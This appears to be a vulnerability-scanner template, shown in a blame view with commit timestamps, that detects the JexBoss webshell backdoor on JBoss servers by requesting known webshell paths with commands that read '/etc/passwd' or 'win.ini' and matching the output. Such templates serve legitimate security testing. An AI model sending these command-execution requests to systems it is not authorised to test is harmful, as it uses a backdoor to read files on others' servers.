2021-12-04 10:09:18 +00:00
id : jexboss-backdoor
info :
2022-10-10 19:22:59 +00:00
name : JexBoss - Remote Code Execution
2021-12-04 10:09:18 +00:00
author : UnkL4b
severity : critical
2022-10-10 19:22:59 +00:00
description : JexBoss is susceptible to remote code execution via the webshell. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2021-12-04 10:09:18 +00:00
reference :
- https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
- https://github.com/joaomatosf/jexboss
2022-07-26 06:59:48 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 8
2022-07-26 06:59:48 +00:00
verified : true
2021-12-21 15:31:11 +00:00
tags : backdoor,jboss,rce
2021-12-04 10:09:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-04 10:09:18 +00:00
- method : GET
path :
2022-07-26 13:45:11 +00:00
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('{{command}}')}}"
2021-12-21 15:27:06 +00:00
payloads :
command :
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2021-12-04 10:09:18 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
2021-12-21 15:27:06 +00:00
- type : regex
2021-12-04 10:09:18 +00:00
part : body
2021-12-21 15:27:06 +00:00
regex :
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition : or
2021-12-04 10:09:18 +00:00
- type : word
part : header
words :
2021-12-21 15:27:06 +00:00
- "X-Powered-By: Servlet"